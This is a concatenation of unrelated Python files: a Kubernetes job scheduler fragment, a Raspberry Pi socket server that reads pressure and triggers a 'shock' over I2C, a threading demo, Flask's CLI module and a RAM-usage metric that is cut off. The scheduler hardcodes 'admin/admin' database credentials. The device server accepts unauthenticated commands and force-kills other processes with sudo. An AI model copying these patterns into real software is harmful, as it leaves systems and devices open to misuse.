# fw = open('system_info.json', 'w', encoding='utf-8')
    # # ensure_ascii defaults to True, which escapes non-ASCII characters as \uXXXX;
    # # setting it to False keeps them human-readable.
    # dic_json = json.dumps(task_content, ensure_ascii=False, indent=4)  # serialise the dict to a JSON string
# fw.write(dic_json)
# fw.close()
url = 'https://192.168.128.10:6443/apis/metrics.k8s.io/v1beta1/nodes'
args = parse()
client = influxdb.InfluxDBClient('192.168.128.10', port=8086, username='admin', password='admin',
database=args.database)
# node_p = Node_mess(url=url,derivation=10,args=args)
node_p = Node_mess(url=url, args=args,tasks=tasks,v1=v1)
# Submit_job(tasks=,lock=,v1=,jobs=)
# Monitor_job(tasks,lock,v1,jobs)
submit_p = multiprocessing.Process(target=Submit_job,args=(tasks,lock,v1,jobs))
monitor_p = multiprocessing.Process(target=Monitor_job,args=(tasks,lock,v1,jobs))
jiance_p = multiprocessing.Process(target=jiance, args=(tasks, lock))
# derivation
node_p.daemon = True
# submit_p.daemon = True
# monitor_p.daemon = True
jiance_p.daemon = True
k1 = os.getpid()
# v1.list_namespace(timeout=)
k2 = multiprocessing.current_process().pid
# v1.delete_namespace()
print(k1, k2)
while True:
boots = input("Please Input 'start' to start:\n")
if boots == 'start':
time_open = math.ceil(time.time())
tmp_list = tasks["creation"]
tmp_list.append(time_open)
tasks["creation"] = tmp_list
node_p.start()
submit_p.start()
monitor_p.start()
jiance_p.start()
if boots == 'end':
tasks['start'] = False
time.sleep(10)
submit_p.join()
monitor_p.join()
if tasks['count']>0:
for ns in tasks['ns']:
print(tasks['ns'])
print("deal ns:"+ns)
pod_status = [i.status.phase for i in v1.list_namespaced_pod(ns).items]
if 'Succeeded' in pod_status or 'Failed' in pod_status:
time.sleep(float(random.randint(3, 10)))
lock.acquire()
ns_tmp = tasks['ns']
command = 'kubectl delete -f /tfdata/tfcnn/expjob/'+ns+'.yaml'
os.system(command)
v1.delete_namespace(ns)
# tasks['job'][ns].delete_tf()
ns_tmp.remove(ns)
tasks['ns'] = ns_tmp
is_layout = tasks['nslayout']
print("is layout: \n")
print(is_layout)
is_layout.pop(ns)
tasks['nslayout'] = is_layout
print("after deal: \n")
print(tasks['nslayout'])
# tasks['job'].pop(ns)
tasks['count'] = len(ns_tmp)
print(tasks['count'])
lock.release()
time.sleep(5)
time_last = math.ceil(time.time())
tmp_list = tasks['endtime']
tmp_list.append(time_last)
tasks["endtime"] = tmp_list
save_config(tasks,filename='system_info.json')
print('System end!')
break
|
semiActiveServer.py
|
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import subprocess
from time import sleep
import smbus
import time
# for RPI version 1, use "bus = smbus.SMBus(0)"
bus = smbus.SMBus(1)
def acceptConnections():
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
Thread(target=handle_client, args=(client, )).start()
def StringToBytes(val):
retVal = []
for c in val:
retVal.append(ord(c))
return retVal
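# Example (illustrative only): StringToBytes maps each character to its ordinal so the
# payload can be passed to write_i2c_block_data, e.g. StringToBytes('25') -> [50, 53].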
def handle_reading_pressure(client, addr, value):
    # read_word_data expects an int register and returns an int; encode it before sending
    block = bus.read_word_data(addr, int(value))
    client.send(str(block).encode('utf-8'))
def handle_activating_shock(client, addr, value):
    bus.write_i2c_block_data(int(addr), 0x00, StringToBytes(value))
    client.send(('Successfully activated shock %s' % value).encode('utf-8'))
def handle_client(client):
    while True:
        data = client.recv(4096)
        if not data:
            break
        payload = data.decode('utf-8').split(',')
        addr = payload[0]
        value = payload[1]
        if payload[0] == '*':
            handle_reading_pressure(client, 30, value)
        if payload[0] == '+':
            handle_activating_shock(client, 30, value)
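# Client-side sketch of the "command,value" protocol handled above (hypothetical peer
# address; the server below listens on PORT on all interfaces). '*' requests a pressure
# reading and '+' triggers a shock:
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(('raspberrypi.local', 6789))   # hypothetical hostname
#   s.send(b'*,0')                           # read pressure register 0
#   print(s.recv(4096))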
clients = {}
HOST = ''
PORT = 6789  # bind() expects an integer port
BUFSIZ = 4096
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
while True:
    try:
        SERVER.bind(ADDR)
        break
    except OSError:
        # a previous instance may still be holding the port; free it and retry
        subprocess.call(
            'sudo lsof -t -i tcp:%d | xargs kill -9' % PORT, shell=True)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=acceptConnections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
threading_daemon_join_timeout.py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
def daemon():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
d = threading.Thread(name='daemon', target=daemon)
d.setDaemon(True)
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
# d.join(1)
d.join(3)
print('d.isAlive()', d.isAlive())
t.join()
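# Expected behaviour (comment added for clarity): the daemon thread sleeps for 2 seconds,
# so d.join(3) returns only after it has logged 'Exiting' and isAlive() prints False.
# With the commented-out d.join(1) the timeout would expire first, isAlive() would print
# True, and the interpreter would exit without waiting for the daemon to finish.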
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: 2010 Pallets
:license: BSD-3-Clause
"""
from __future__ import print_function
import ast
import inspect
import os
import platform
import re
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from ._compat import getargspec
from ._compat import itervalues
from ._compat import reraise
from ._compat import text_type
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in itervalues(module.__dict__) if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
"one.".format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
"could not call it without arguments. Use "
"\"FLASK_APP='{module}:{factory}(args)'\" to specify "
"arguments.".format(factory=attr_name, module=module.__name__)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(module=module.__name__)
)
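# Illustrative note (not part of Flask itself): for a hypothetical module hello.py that
# does ``app = Flask(__name__)``, find_best_app(script_info, hello) returns that instance
# via the attribute search above, while a module exposing only ``def create_app(): ...``
# is resolved through the factory branch.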
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if "script_info" in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
# explicitly delete tb as it is circular referenced
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from . import Flask
match = re.match(r"^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$", app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
"expression.".format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval("({args},)".format(args=args))
except (ValueError, SyntaxError) as e:
raise NoAppException(
"Could not parse the arguments in "
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
"be called with the specified arguments.".format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from "
'"{module}:{app_name}".'.format(module=module.__name__, app_name=app_name)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
"\n\n{tb}".format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException('Could not import "{name}".'.format(name=module_name))
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
message = "Python %(python)s\nFlask %(flask)s\nWerkzeug %(werkzeug)s"
click.echo(
message
% {
"python": platform.python_version(),
"flask": __version__,
"werkzeug": werkzeug.__version__,
},
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
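# Usage sketch (hypothetical command; assumes it is invoked through the flask CLI so a
# ScriptInfo object is available on the click context):
#   @click.command()
#   @with_appcontext
#   def seed_db():
#       current_app.logger.info("seeding...")  # runs inside an application context
# Commands registered via app.cli receive this wrapping automatically unless
# with_appcontext=False is passed (see AppGroup.command below).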
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The available commands are the built-in commands plus those of the
# application (if it could be loaded).
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
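# Worked example of the check above (paths are illustrative, POSIX separators
# assumed):
#   _path_is_ancestor("/srv/app", "/srv/app/instance")  -> True
#   _path_is_ancestor("/srv/app", "/srv/application")   -> False, because
#   joining "/srv/app" with "lication" yields "/srv/app/lication".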
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if an explicit path was given, load only that file; return False if it
# does not point to an existing file
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
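# Precedence sketch (variable name is illustrative): if both ".env" and
# ".flaskenv" define FLASK_RUN_PORT, the ".env" value wins because it is
# loaded first and already-set environment variables are never overwritten.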
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(" * Environment: {0}".format(env))
if env == "production":
click.secho(
" WARNING: This is a development server. "
"Do not use it in a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(" * Debug mode: {0}".format("on" if debug else "off"))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import OpenSSL # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires pyOpenSSL.", ctx, param
)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
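# Accepted "--cert"/"--key" combinations, based on the two callbacks above
# (file names and module path are illustrative):
#   flask run --cert cert.pem --key key.pem    # certificate/key file pair
#   flask run --cert adhoc                     # ad-hoc cert, needs pyOpenSSL
#   flask run --cert mymodule:ctx              # imported ssl.SSLContext, no --key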
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:`` on POSIX, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super(SeparatedPathType, self).convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loader",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
" are separated by '{}'.".format(os.path.pathsep)
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
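# Invocation sketch (application file name is an assumption), mirroring the
# help text at the bottom of this module:
#   $ export FLASK_APP=hello.py
#   $ export FLASK_ENV=development   # enables the reloader and debugger
#   $ flask run --host 0.0.0.0 --port 8000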
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = "Python %s on %s\nApp: %s [%s]\nInstance: %s" % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup, "r") as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
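# Example of the table printed above (the "index" endpoint is an illustrative
# assumption; "static" is Flask's default static route):
#   Endpoint  Methods  Rule
#   --------  -------  -----------------------
#   index     GET      /
#   static    GET      /static/<path:filename>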
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:], prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
ram_usage.py
|
################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import os
import time
from typing import Optional, List, TYPE_CHECKING
from threading import Thread
from psutil import Process
from avalanche.evaluation import Metric, PluginMetric, GenericPluginMetric
from avalanche.evaluation.metric_results import MetricResult
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxRAM(Metric[float]):
"""
The standalone RAM usage metric.
Important: this metric approximates the real maximum RAM usage, since
it samples the RAM value at discrete time intervals.
Instances of this metric keep the maximum RAM usage detected so far.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
The result, obtained using the `result` method, is the usage in megabytes.
The reset method will bring the metric back to its initial state. By default
this metric in its initial state will return a usage value of 0.
"""
def __init__(self, every=1):
"""
Creates an instance of the RAM usage metric.
:param every: seconds between consecutive updates of the maximum RAM usage
"""
self._process_handle: Optional[Process] = Process(os.getpid())
"""
The handle to the monitored process.
"""
self.every = every
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max RAM usage.
"""
self.thread = None
"""
Thread executing RAM monitoring code
"""
def _f(self):
"""
Until a stop signal is encountered, this function samples the RAM used
by the process every `every` seconds and records the maximum observed.
"""
start_time = time.monotonic()
while not self.stop_f:
# ram usage in MB
ram_usage = self._process_handle.memory_info().rss / 1024 / 1024
if ram_usage > self.max_usage:
self.max_usage = ram_usage
time.sleep(self.every - ((time.monotonic() - start_time)
% self.every))
def result(self) -> Optional[float]:
"""
Retrieves the RAM usage.
Calling this method will not change the internal state of the metric.
:return: The maximum RAM usage in megabytes, as a float value.
"""
return self.max_usage
def start_thread(self):
assert not self.thread, "Trying to start thread " \
"without joining the previous."
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def update(self):
pass
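# Standalone usage sketch for MaxRAM (sampling interval and workload are
# illustrative):
#
#   ram = MaxRAM(every=0.5)
#   ram.start_thread()
#   ...                      # run the workload to be measured
#   peak_mb = ram.result()   # maximum RSS observed so far, in megabytes
#   ram.stop_thread()
#   ram.reset()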
class RAMPluginMetric(GenericPluginMetric[float]):
def __init__(self, every, reset_at, emit_at, mode):
self._ram = MaxRAM(every)
super(RAMPluginMetric, self).__init__(
